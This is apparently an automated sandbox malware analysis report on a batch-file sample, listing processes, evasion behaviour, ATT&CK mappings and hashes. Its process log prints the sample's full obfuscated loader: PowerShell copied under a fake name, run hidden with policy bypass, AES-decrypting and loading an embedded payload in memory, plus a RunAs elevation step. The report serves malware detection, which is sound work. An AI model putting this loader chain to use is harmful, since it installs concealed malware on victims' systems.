Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8216			Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Window / User API: threadDelayed 8635			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4704	Thread sleep count: 8216 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 780	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1900	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe TID: 1592	Thread sleep count: 8635 > 30	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe TID: 2484	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\new_7.txt.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\new_7.txt.bat.exe new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $gerdcs = [system.io.file]::readalltext('c:\users\user\desktop\new_7.txt.bat').split([environment]::newline);$wnrxws = $gerdcs[$gerdcs.length - 1];$tnzjht = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('using system.text;using system.io;using system.io.compression;using system.security.cryptography; public class hbjtwl { public static byte[] aptbpb(byte[] input, byte[] key, byte[] iv) { aesmanaged aes = new aesmanaged(); aes.mode = ciphermode.cbc; aes.padding = paddingmode.pkcs7; icryptotransform decryptor = aes.createdecryptor(key, iv); byte[] decrypted = decryptor.transformfinalblock(input, 0, input.length); decryptor.dispose(); aes.dispose(); return decrypted; } public static byte[] xldugb(byte[] bytes) { memorystream msi = new memorystream(bytes); memorystream mso = new memorystream(); var gs = new gzipstream(msi, compressionmode.decompress); gs.copyto(mso); gs.dispose(); msi.dispose(); mso.dispose(); return mso.toarray(); } }'));add-type -typedefinition $tnzjht;[system.reflection.assembly]::load([hbjtwl]::xldugb([hbjtwl]::aptbpb([system.convert]::frombase64string($wnrxws), [system.convert]::frombase64string('mjrhig1y63akcbvdphdi4ujaxgmcetuk1uw/ctyuszu='), [system.convert]::frombase64string('o0lnlh6czrdncdgsa1apww==')))).entrypoint.invoke($null, (, [string[]] ('am_admin')))
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\new_7.txt.bat.exe new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $gerdcs = [system.io.file]::readalltext('c:\users\user\desktop\new_7.txt.bat').split([environment]::newline);$wnrxws = $gerdcs[$gerdcs.length - 1];$tnzjht = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('using system.text;using system.io;using system.io.compression;using system.security.cryptography; public class hbjtwl { public static byte[] aptbpb(byte[] input, byte[] key, byte[] iv) { aesmanaged aes = new aesmanaged(); aes.mode = ciphermode.cbc; aes.padding = paddingmode.pkcs7; icryptotransform decryptor = aes.createdecryptor(key, iv); byte[] decrypted = decryptor.transformfinalblock(input, 0, input.length); decryptor.dispose(); aes.dispose(); return decrypted; } public static byte[] xldugb(byte[] bytes) { memorystream msi = new memorystream(bytes); memorystream mso = new memorystream(); var gs = new gzipstream(msi, compressionmode.decompress); gs.copyto(mso); gs.dispose(); msi.dispose(); mso.dispose(); return mso.toarray(); } }'));add-type -typedefinition $tnzjht;[system.reflection.assembly]::load([hbjtwl]::xldugb([hbjtwl]::aptbpb([system.convert]::frombase64string($wnrxws), [system.convert]::frombase64string('mjrhig1y63akcbvdphdi4ujaxgmcetuk1uw/ctyuszu='), [system.convert]::frombase64string('o0lnlh6czrdncdgsa1apww==')))).entrypoint.invoke($null, (, [string[]] ('am_admin')))			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\user\Desktop\new_7.txt.bat"' -ArgumentList 'am_admin'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\new_7.txt.bat" am_admin	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new_7.txt.bat.exe /y	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h new_7.txt.bat.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\new_7.txt.bat.exe new_7.txt.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $GErDCs = [System.IO.File]::ReadAllText('C:\Users\user\Desktop\new_7.txt.bat').Split([Environment]::NewLine);$wnrxWS = $GErDCs[$GErDCs.Length - 1];$TNzJht = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('using System.Text;using System.IO;using System.IO.Compression;using System.Security.Cryptography; public class HBjTWL { public static byte[] apTBPb(byte[] input, byte[] key, byte[] iv) { AesManaged aes = new AesManaged(); aes.Mode = CipherMode.CBC; aes.Padding = PaddingMode.PKCS7; ICryptoTransform decryptor = aes.CreateDecryptor(key, iv); byte[] decrypted = decryptor.TransformFinalBlock(input, 0, input.Length); decryptor.Dispose(); aes.Dispose(); return decrypted; } public static byte[] xLdugB(byte[] bytes) { MemoryStream msi = new MemoryStream(bytes); MemoryStream mso = new MemoryStream(); var gs = new GZipStream(msi, CompressionMode.Decompress); gs.CopyTo(mso); gs.Dispose(); msi.Dispose(); mso.Dispose(); return mso.ToArray(); } }'));Add-Type -TypeDefinition $TNzJht;[System.Reflection.Assembly]::Load([HBjTWL]::xLdugB([HBjTWL]::apTBPb([System.Convert]::FromBase64String($wnrxWS), [System.Convert]::FromBase64String('MjRhIG1Y63akCBVDPHdI4uJaXGMCeTuk1uW/CtYuSZU='), [System.Convert]::FromBase64String('o0lNLh6cZrdnCdGsa1aPww==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -s -h new_7.txt.bat.exe	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\new_7.txt.bat.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\new_7.txt.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Command and Scripting Interpreter	Path Interception	11 Process Injection	11 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Data Obfuscation	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scripting	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	11 Process Injection	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Scripting	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\new_7.txt.bat.exe	0%	Virustotal		Browse
C:\Users\user\Desktop\new_7.txt.bat.exe	5%	Metadefender		Browse

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://crl.v	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	new_7.txt.bat.exe, 00000008.00000002.345458231.0000022EA3E1A000.00000004.00000800.00020000.00000000.sdmp, new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	new_7.txt.bat.exe, 00000008.00000002.326465249.0000022E93C61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	new_7.txt.bat.exe, 00000008.00000002.347158292.0000022EABD70000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	new_7.txt.bat.exe, 00000008.00000002.341986393.0000022E95088000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	new_7.txt.bat.exe, 00000008.00000002.327410941.0000022E93E6A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	new_7.txt.bat.exe, 00000008.00000002.345458231.0000022EA3E1A000.00000004.00000800.00020000.00000000.sdmp, new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	new_7.txt.bat.exe, 00000008.00000002.344516480.0000022EA3CE4000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	722277
Start date and time:	2022-10-13 11:11:09 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	new_7.txt.bat
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal60.evad.winBAT@17/7@0/0
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 95% Number of executed functions: 22 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .bat Stop behavior analysis, all processes terminated

Warnings

Execution Graph export aborted for target new_7.txt.bat.exe, PID 5216 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:12:05	API Interceptor	10x Sleep call for process: powershell.exe modified
11:12:12	API Interceptor	14x Sleep call for process: new_7.txt.bat.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\Desktop\new_7.txt.bat.exe	RYqBekH3KI.bat	Get hash	malicious	Browse
	6UYJe0kL46.exe	Get hash	malicious	Browse
	client.bat	Get hash	malicious	Browse
	cleaner.bat	Get hash	malicious	Browse
	cleaner.bat	Get hash	malicious	Browse
	3eZ74K3lnn.exe	Get hash	malicious	Browse
	1dGBb5N0oG.exe	Get hash	malicious	Browse
	dad_.exe	Get hash	malicious	Browse
	4.ppam	Get hash	malicious	Browse
	4.ppam	Get hash	malicious	Browse
	malicious.ps1	Get hash	malicious	Browse
	mltqanainst.exe	Get hash	malicious	Browse
	lemonduck.bat	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\new_7.txt.bat.exe.log

Download File

Process:	C:\Users\user\Desktop\new_7.txt.bat.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	3048
Entropy (8bit):	5.357847808490925
Encrypted:	false
SSDEEP:	48:MxHKEYHKGD8Ao6+ztBTEHH+MHPtHTG1hAHKKPbHK3HK2uW+0trjUMZ7mHKww+7++:iqEYqGgAo9xBAHtvtzG1eqKPbq3qxYro
MD5:	7BD1D7AEF5EF6C0CA51BF8A182126707
SHA1:	F26D6C51DB88AAE05A92C83D69BD5A7E32E8AB18
SHA-256:	F2F79FA461063DF9582781738AF90BD81D3151D51314A7F5A142C35955A121BB
SHA-512:	06841DC2E5F2F0E720A8B601D23D813ECF88AD4B64736AD5D25B343DBCE1F7D9EFEDDC91F0E4406DF2BD80DC030D4EC4853A7186107233BA64C045F2BA36072D
Malicious:	false
